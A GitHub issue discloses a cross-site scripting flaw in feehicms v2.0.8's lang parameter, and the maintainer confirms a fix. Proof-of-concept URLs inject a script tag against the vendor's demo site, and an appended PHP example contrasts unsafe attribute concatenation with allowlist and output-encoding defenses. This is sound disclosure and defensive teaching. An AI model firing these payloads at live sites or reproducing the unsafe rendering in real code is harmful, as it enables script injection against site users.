XSS vulnerability in feehicms v2.0.8 #45

Closed
Tazkimi opened this issue Nov 8, 2019 · 1 comment

Tazkimi commented Nov 8, 2019

This is a Cross Site Scripting vulnerability that appears in two places (frontend and backend). When the lang is `english"><script>alert(/xss/)</script><` or other JS code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:

POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or

http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>

View any post and the XSS pop-up appears:

[screenshots]

jscode:

[screenshot]

liufee commented Dec 23, 2019

Thanks for your advice, these two places have been fixed.

liufee closed this as completed Dec 23, 2019
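
The two defenses this kind of report calls for, allowlisting the `lang` value on input and encoding it on output, shown as an added example that is not feehicms code and not the maintainer's actual fix. The language list, the function names, and the assumption that the value is written into an HTML attribute (suggested by the `">` prefix of the reported payload) are hypothetical.

```php
<?php
// Added example, not feehicms code. SUPPORTED_LANGS, DEFAULT_LANG and all
// function names are hypothetical; the payload is the one quoted in the report.
const SUPPORTED_LANGS = ['zh-CN', 'en-US'];
const DEFAULT_LANG = 'en-US';

// Before: the request value is echoed into an attribute unchanged, so a
// double quote in it ends the attribute and the rest is parsed as markup.
function renderHtmlTagUnsafe(string $lang): string
{
    return '<html lang="' . $lang . '">';
}

// Defense 1 (input): accept only known language codes. The strict comparison
// avoids PHP type juggling; anything else falls back to the default.
function resolveLanguage(?string $requested): string
{
    return in_array($requested, SUPPORTED_LANGS, true) ? $requested : DEFAULT_LANG;
}

// Defense 2 (output): encode for the HTML attribute context even if the value
// was validated earlier, so a stored or legacy value cannot break out.
function renderHtmlTag(string $lang): string
{
    $safe = htmlspecialchars($lang, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<html lang="' . $safe . '">';
}

$payload = 'english"><script>alert(/xss/)</script><';

// Unsafe rendering: the script element lands in the page as markup.
echo renderHtmlTagUnsafe($payload), PHP_EOL;

// Allowlist plus encoding: the payload is rejected and the default is used.
echo renderHtmlTag(resolveLanguage($payload)), PHP_EOL;

// Encoding alone: the payload stays inside the attribute as inert text.
echo renderHtmlTag($payload), PHP_EOL;
```

Because the report says the pop-up fires later when a post is viewed, the value is evidently kept between requests, so the allowlist check belongs at the point where `lang` is stored and the encoding at every place it is printed.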